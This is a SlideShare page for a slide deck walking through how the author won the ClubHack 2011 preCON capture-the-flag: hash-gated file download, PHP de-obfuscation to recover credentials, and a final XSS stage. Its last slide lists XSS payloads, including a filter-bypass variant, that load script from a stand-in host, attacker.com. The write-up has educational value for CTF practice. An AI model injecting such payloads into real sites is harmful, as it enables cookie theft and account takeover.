SlideShare ist ein Scribd-Unternehmen logo

How i-won-club hack-precon-ctf-v2

n|u - The Open Security Community
n|u - The Open Security Community

null December'11 Pune Meet

BildungTechnologie
1 von 18
How I won ClubHack 2011 CTF AMol NAik http://amolnaik4.blogspot.com
Agenda  Introduction to CTF  ClubHack 2011 preCON CTF  Tools  Execution Stages  Thanks/Questions
Introduction to CTF  CTF stands for Capture the Flag  Types:  Pre-conference  Educational  Web based  Exploitation  Web + Exploitation  Teams / Individuals  Offensive / Defensive
ClubHack 2011 preCON CTF  Free conference entry  Qualified to play Treasure Hunt @ClubHack  Physical CTF  Web Based
Tools  Mozilla Firefox  Add-on: Tamper Data  Web Server with PHP  Brain  Time  Patience  ……..  ……..
Execution  Register for the event  Access CTF site  Gather Information & Analyze  Look for hidden treasures  Get the Flag and Submit
Stage - 1  Information Gathering  Download.html  Can be used to download files from server  Two params: filename & some HASH  How imp the hash is in file download ?  What type of Hash it is?  How to generate it?  UserLogin.html  Auth Bypass  Guessable Logins  What else ???
Stage - 1  Analysis  Download.html  Need hash to download file  Hash is SHA1  How to generate it?  UserLogin.html  No SQLi  No Auth Bypass  No Guessable Login  Brute Force ???
Stage - 2  Deep Inspection  Found „execute.php‟ in source of download.html   Looks like command utility  OS commanding ???  Analysis  No OS command execution  “Wonly one command”  Commands which takes „file‟ as parameter ???  Single Command  sha1sum
Stage - 3  Something to work on  Hash generation – execute.php  File Download – download.php  Login – UserLogin.php  Try to download files  Download.php  Execute.php  UserLogin.php  Analysis  Only „UserLogin.php‟ is possible to download
Stage - 4  Obfuscated PHP Code  UserLogin.php is obfuscated  “Free Online PHP Obfuscator v1.2: http://www.fopo.com.a r”  No Online de-obfuscation tool available   I was not able to find out one  Analysis  Go Manual Mode !!  Create scripts
Stage - 5  De-Obfuscation  Replace eval() with echo() -  Base64_decode()  Decode $variable names  Replace $variables -  ROT13 -> Base64_decode() -> gzinflate()  Just echo  -
Stage - 5  Analysis  Credentials -> „myhashesarenothere.txt‟  Successful Login -> Final.php  Next  Access „myhashesarenothere.txt‟  Login in UserLogin.php
Stage – 6: Final  Information Gathering  POST form  Looks like mail client  Hard-coded email addresses & Subject  Message is the only available space for User Input  Analysis  Tamper „TO‟ email address & „Subject‟  Test „Message‟ for SQLi, Code Injection, ….  What else ???
Stage – 6: Final  Damn…It‟s a ROCK !!!!  No server-side bug  Code Injection  SQLi  Only XSS  No <script> & <img>  May be flag.txt  May be messages.txt || mail.txt || sec*.txt  ?????  ?????
Stage – 6: Final  A Ray of Hope  Tweet from @ClubHack  Only “XSS”  Never seen XSS in CTF  What to exploit?  Myself??  Event Handlers  document.cookie  Did they mean “Some Cookie” ?
Final  After 2-days  Got Flag & Submit link   Free entry to ClubHack -> Secured !!  Payloads Used:  <ScRiPt src=“http://attacker.com/evil.js”></script>  me  <scr<script>ipt src=“http://attacker.com/evil.js”></script>  Vishal Oza
Thanks/Questions  webDEViL  CTF Creation and Access for “Live Demo”  ClubHack  Organizing CTF challenge  For Gifts !!! http://twitter.com/amolnaik4

Empfohlen

Club hack 2011 precon ctf walkthrough
Club hack 2011 precon ctf walkthroughClub hack 2011 precon ctf walkthrough
Club hack 2011 precon ctf walkthroughn|u - The Open Security Community
 
File upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorFile upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorPaolo Dolci
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
Abusing Windows Opener To Bypass CSRF Protection
Abusing Windows Opener To Bypass CSRF ProtectionAbusing Windows Opener To Bypass CSRF Protection
Abusing Windows Opener To Bypass CSRF ProtectionNarendra Bhati
 
OWASP Pune Chapter : Dive Into The Profound Web Attacks
OWASP Pune Chapter : Dive Into The Profound Web AttacksOWASP Pune Chapter : Dive Into The Profound Web Attacks
OWASP Pune Chapter : Dive Into The Profound Web AttacksNarendra Bhati
 
CNIT 124: Ch 5: Information Gathering
CNIT 124: Ch 5: Information GatheringCNIT 124: Ch 5: Information Gathering
CNIT 124: Ch 5: Information GatheringSam Bowne
 
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting DomainsCNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting DomainsSam Bowne
 
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Ismail Tasdelen
 

Empfohlen

Club hack 2011 precon ctf walkthrough
Club hack 2011 precon ctf walkthroughClub hack 2011 precon ctf walkthrough
Club hack 2011 precon ctf walkthroughn|u - The Open Security Community
 
File upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorFile upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorPaolo Dolci
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
Abusing Windows Opener To Bypass CSRF Protection
Abusing Windows Opener To Bypass CSRF ProtectionAbusing Windows Opener To Bypass CSRF Protection
Abusing Windows Opener To Bypass CSRF ProtectionNarendra Bhati
 
OWASP Pune Chapter : Dive Into The Profound Web Attacks
OWASP Pune Chapter : Dive Into The Profound Web AttacksOWASP Pune Chapter : Dive Into The Profound Web Attacks
OWASP Pune Chapter : Dive Into The Profound Web AttacksNarendra Bhati
 
CNIT 124: Ch 5: Information Gathering
CNIT 124: Ch 5: Information GatheringCNIT 124: Ch 5: Information Gathering
CNIT 124: Ch 5: Information GatheringSam Bowne
 
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting DomainsCNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting DomainsSam Bowne
 
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Ismail Tasdelen
 
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawEC-Council
 
Php File Upload
Php File UploadPhp File Upload
Php File Uploadsaeel005
 
Anatomy of PHP Shells
Anatomy of PHP ShellsAnatomy of PHP Shells
Anatomy of PHP ShellsVedran Krivokuca
 
Installation of OpenBiblio on Windows XP using EasyPHP
Installation of OpenBiblio on Windows XP using EasyPHPInstallation of OpenBiblio on Windows XP using EasyPHP
Installation of OpenBiblio on Windows XP using EasyPHPRupesh Kumar
 
PHP: The Beginning and the Zend
PHP: The Beginning and the ZendPHP: The Beginning and the Zend
PHP: The Beginning and the Zenddoublecompile
 
PHP presentation - Com 585
PHP presentation - Com 585PHP presentation - Com 585
PHP presentation - Com 585jstout007
 
File inclusion
File inclusionFile inclusion
File inclusionAaftabKhan14
 
Php
PhpPhp
Phpanandha ganesh
 
Web backends development using Python
Web backends development using PythonWeb backends development using Python
Web backends development using PythonAyun Park
 
PHP Presentation
PHP PresentationPHP Presentation
PHP PresentationJIGAR MAKHIJA
 
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdf
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdfBrute Force - Lior Rotkovitch - f5 SIRT v5.pdf
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdfLior Rotkovitch
 
PHP Tutorials
PHP TutorialsPHP Tutorials
PHP TutorialsYuriy Krapivko
 
LFI to RCE
LFI to RCELFI to RCE
LFI to RCEn|u - The Open Security Community
 
Building websites with TYPO3 Neos
Building websites with TYPO3 NeosBuilding websites with TYPO3 Neos
Building websites with TYPO3 NeosFedir RYKHTIK
 
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Executionn|u - The Open Security Community
 
Web Browsers And Other Mistakes
Web Browsers And Other MistakesWeb Browsers And Other Mistakes
Web Browsers And Other Mistakesguest2821a2
 
Php intro
Php introPhp intro
Php introJennie Gajjar
 
Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Imperva
 
MySQL Presentation
MySQL PresentationMySQL Presentation
MySQL PresentationManish Bothra
 
Cara Meraih Sukses Secara Finansial 2
Cara Meraih Sukses Secara Finansial 2Cara Meraih Sukses Secara Finansial 2
Cara Meraih Sukses Secara Finansial 2Indonesia Infrastructure Initiative
 
January Phoenix Area Market Report
January Phoenix Area Market ReportJanuary Phoenix Area Market Report
January Phoenix Area Market ReportLen Nevin
 
BJ Reunião com Formadores 07dez09
BJ Reunião com Formadores 07dez09BJ Reunião com Formadores 07dez09
BJ Reunião com Formadores 07dez09Marcelo Nonato
 

Weitere ähnliche Inhalte

Was ist angesagt?

TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawEC-Council
 
Php File Upload
Php File UploadPhp File Upload
Php File Uploadsaeel005
 
Installation of OpenBiblio on Windows XP using EasyPHP
Installation of OpenBiblio on Windows XP using EasyPHPInstallation of OpenBiblio on Windows XP using EasyPHP
Installation of OpenBiblio on Windows XP using EasyPHPRupesh Kumar
 
PHP: The Beginning and the Zend
PHP: The Beginning and the ZendPHP: The Beginning and the Zend
PHP: The Beginning and the Zenddoublecompile
 
PHP presentation - Com 585
PHP presentation - Com 585PHP presentation - Com 585
PHP presentation - Com 585jstout007
 
Web backends development using Python
Web backends development using PythonWeb backends development using Python
Web backends development using PythonAyun Park
 
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdf
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdfBrute Force - Lior Rotkovitch - f5 SIRT v5.pdf
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdfLior Rotkovitch
 
Building websites with TYPO3 Neos
Building websites with TYPO3 NeosBuilding websites with TYPO3 Neos
Building websites with TYPO3 NeosFedir RYKHTIK
 
Web Browsers And Other Mistakes
Web Browsers And Other MistakesWeb Browsers And Other Mistakes
Web Browsers And Other Mistakesguest2821a2
 
Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Imperva
 

Was ist angesagt? (19)

TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
 
Php File Upload
Php File UploadPhp File Upload
Php File Upload
 
Anatomy of PHP Shells
Anatomy of PHP ShellsAnatomy of PHP Shells
Anatomy of PHP Shells
 
Installation of OpenBiblio on Windows XP using EasyPHP
Installation of OpenBiblio on Windows XP using EasyPHPInstallation of OpenBiblio on Windows XP using EasyPHP
Installation of OpenBiblio on Windows XP using EasyPHP
 
PHP: The Beginning and the Zend
PHP: The Beginning and the ZendPHP: The Beginning and the Zend
PHP: The Beginning and the Zend
 
PHP presentation - Com 585
PHP presentation - Com 585PHP presentation - Com 585
PHP presentation - Com 585
 
File inclusion
File inclusionFile inclusion
File inclusion
 
Php
PhpPhp
Php
 
Web backends development using Python
Web backends development using PythonWeb backends development using Python
Web backends development using Python
 
PHP Presentation
PHP PresentationPHP Presentation
PHP Presentation
 
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdf
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdfBrute Force - Lior Rotkovitch - f5 SIRT v5.pdf
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdf
 
PHP Tutorials
PHP TutorialsPHP Tutorials
PHP Tutorials
 
LFI to RCE
LFI to RCELFI to RCE
LFI to RCE
 
Building websites with TYPO3 Neos
Building websites with TYPO3 NeosBuilding websites with TYPO3 Neos
Building websites with TYPO3 Neos
 
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution
 
Web Browsers And Other Mistakes
Web Browsers And Other MistakesWeb Browsers And Other Mistakes
Web Browsers And Other Mistakes
 
Php intro
Php introPhp intro
Php intro
 
Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101
 
MySQL Presentation
MySQL PresentationMySQL Presentation
MySQL Presentation
 

Andere mochten auch

January Phoenix Area Market Report
January Phoenix Area Market ReportJanuary Phoenix Area Market Report
January Phoenix Area Market ReportLen Nevin
 
BJ Reunião com Formadores 07dez09
BJ Reunião com Formadores 07dez09BJ Reunião com Formadores 07dez09
BJ Reunião com Formadores 07dez09Marcelo Nonato
 

Andere mochten auch (6)

Cara Meraih Sukses Secara Finansial 2
Cara Meraih Sukses Secara Finansial 2Cara Meraih Sukses Secara Finansial 2
Cara Meraih Sukses Secara Finansial 2
 
January Phoenix Area Market Report
January Phoenix Area Market ReportJanuary Phoenix Area Market Report
January Phoenix Area Market Report
 
BJ Reunião com Formadores 07dez09
BJ Reunião com Formadores 07dez09BJ Reunião com Formadores 07dez09
BJ Reunião com Formadores 07dez09
 
Ecoporanga
EcoporangaEcoporanga
Ecoporanga
 
CGI Proxy
CGI ProxyCGI Proxy
CGI Proxy
 
Louvre u geziyoruz
Louvre u geziyoruzLouvre u geziyoruz
Louvre u geziyoruz
 

Ähnlich wie How i-won-club hack-precon-ctf-v2

Php vulnerability presentation
Php vulnerability presentationPhp vulnerability presentation
Php vulnerability presentationSqa Enthusiast
 
Anant kochhar _revealing_the_secrets - ClubHack2009
Anant kochhar _revealing_the_secrets - ClubHack2009Anant kochhar _revealing_the_secrets - ClubHack2009
Anant kochhar _revealing_the_secrets - ClubHack2009ClubHack
 
Php through the eyes of a hoster: PHPNW10
Php through the eyes of a hoster: PHPNW10Php through the eyes of a hoster: PHPNW10
Php through the eyes of a hoster: PHPNW10Combell NV
 
Introducing OWASP OWTF Workshop BruCon 2012
Introducing OWASP OWTF Workshop BruCon 2012Introducing OWASP OWTF Workshop BruCon 2012
Introducing OWASP OWTF Workshop BruCon 2012Abraham Aranguren
 
Columbus WordCamp 2015
Columbus WordCamp 2015Columbus WordCamp 2015
Columbus WordCamp 2015Jason Packer
 
Abraham aranguren. legal and efficient web app testing without permission
Abraham aranguren. legal and efficient web app testing without permissionAbraham aranguren. legal and efficient web app testing without permission
Abraham aranguren. legal and efficient web app testing without permissionYury Chemerkin
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)Larry Cashdollar
 
All the Laravel things: up and running to making $$
All the Laravel things: up and running to making $$All the Laravel things: up and running to making $$
All the Laravel things: up and running to making $$Joe Ferguson
 
Site Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariSite Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariJoseph Scott
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practicesAmit Kejriwal
 
The why and how of moving to php 8
The why and how of moving to php 8The why and how of moving to php 8
The why and how of moving to php 8Wim Godden
 
PowerPoint Presentation
PowerPoint PresentationPowerPoint Presentation
PowerPoint Presentationwebhostingguy
 
Symfony2 - A Short Introduction
Symfony2 - A Short IntroductionSymfony2 - A Short Introduction
Symfony2 - A Short IntroductionAndy Grunwald
 
The why and how of moving to php 5.4
The why and how of moving to php 5.4The why and how of moving to php 5.4
The why and how of moving to php 5.4Wim Godden
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoPichaya Morimoto
 

Ähnlich wie How i-won-club hack-precon-ctf-v2 (20)

Php vulnerability presentation
Php vulnerability presentationPhp vulnerability presentation
Php vulnerability presentation
 
Anant kochhar _revealing_the_secrets - ClubHack2009
Anant kochhar _revealing_the_secrets - ClubHack2009Anant kochhar _revealing_the_secrets - ClubHack2009
Anant kochhar _revealing_the_secrets - ClubHack2009
 
Php through the eyes of a hoster: PHPNW10
Php through the eyes of a hoster: PHPNW10Php through the eyes of a hoster: PHPNW10
Php through the eyes of a hoster: PHPNW10
 
Talking to Web Services
Talking to Web ServicesTalking to Web Services
Talking to Web Services
 
Introducing OWASP OWTF Workshop BruCon 2012
Introducing OWASP OWTF Workshop BruCon 2012Introducing OWASP OWTF Workshop BruCon 2012
Introducing OWASP OWTF Workshop BruCon 2012
 
Columbus WordCamp 2015
Columbus WordCamp 2015Columbus WordCamp 2015
Columbus WordCamp 2015
 
Abraham aranguren. legal and efficient web app testing without permission
Abraham aranguren. legal and efficient web app testing without permissionAbraham aranguren. legal and efficient web app testing without permission
Abraham aranguren. legal and efficient web app testing without permission
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
 
All the Laravel things: up and running to making $$
All the Laravel things: up and running to making $$All the Laravel things: up and running to making $$
All the Laravel things: up and running to making $$
 
Site Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariSite Performance - From Pinto to Ferrari
Site Performance - From Pinto to Ferrari
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practices
 
Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASP
 
Kohana 3.1
Kohana 3.1Kohana 3.1
Kohana 3.1
 
The why and how of moving to php 8
The why and how of moving to php 8The why and how of moving to php 8
The why and how of moving to php 8
 
PowerPoint Presentation
PowerPoint PresentationPowerPoint Presentation
PowerPoint Presentation
 
Symfony2 - A Short Introduction
Symfony2 - A Short IntroductionSymfony2 - A Short Introduction
Symfony2 - A Short Introduction
 
The why and how of moving to php 5.4
The why and how of moving to php 5.4The why and how of moving to php 5.4
The why and how of moving to php 5.4
 
XML External Entity (XXE)
XML External Entity (XXE)XML External Entity (XXE)
XML External Entity (XXE)
 
2018 Writing Offensive .Net Tools
2018 Writing Offensive .Net Tools2018 Writing Offensive .Net Tools
2018 Writing Offensive .Net Tools
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
 

Mehr von n|u - The Open Security Community

Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...n|u - The Open Security Community
 

Mehr von n|u - The Open Security Community (20)

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
 
Osint primer
Osint primerOsint primer
Osint primer
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
 
Cloud security
Cloud security Cloud security
Cloud security
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
 

Kürzlich hochgeladen

Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...fonyou31
 
Introduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsIntroduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsTechSoup
 
Z Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphZ Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphThiyagu K
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Krashi Coaching
 
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in DelhiRussian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhikauryashika82
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfciinovamais
 
Measures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeMeasures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeThiyagu K
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introductionMaksud Ahmed
 
Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104misteraugie
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfagholdier
 
Key note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfKey note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfAdmir Softic
 
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...Sapna Thakur
 
Student login on Anyboli platform.helpin
Student login on Anyboli platform.helpinStudent login on Anyboli platform.helpin
Student login on Anyboli platform.helpinRaunakKeshri1
 
9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room service9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room servicediscovermytutordmt
 
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdfBASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdfSoniaTolstoy
 
Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3JemimahLaneBuaron
 
Sanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfSanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfsanyamsingh5019
 
General AI for Medical Educators April 2024
General AI for Medical Educators April 2024General AI for Medical Educators April 2024
General AI for Medical Educators April 2024Janet Corral
 
Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)eniolaolutunde
 

Kürzlich hochgeladen (20)

Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
 
Introduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsIntroduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The Basics
 
Z Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphZ Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot Graph
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
 
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in DelhiRussian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdf
 
Measures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeMeasures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and Mode
 
Advance Mobile Application Development class 07
Advance Mobile Application Development class 07Advance Mobile Application Development class 07
Advance Mobile Application Development class 07
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introduction
 
Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdf
 
Key note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfKey note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdf
 
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
 
Student login on Anyboli platform.helpin
Student login on Anyboli platform.helpinStudent login on Anyboli platform.helpin
Student login on Anyboli platform.helpin
 
9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room service9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room service
 
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdfBASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
 
Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3
 
Sanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfSanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdf
 
General AI for Medical Educators April 2024
General AI for Medical Educators April 2024General AI for Medical Educators April 2024
General AI for Medical Educators April 2024
 
Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)
 

How i-won-club hack-precon-ctf-v2

  • 1. How I won ClubHack 2011 CTF AMol NAik http://amolnaik4.blogspot.com
  • 2. Agenda  Introduction to CTF  ClubHack 2011 preCON CTF  Tools  Execution Stages  Thanks/Questions
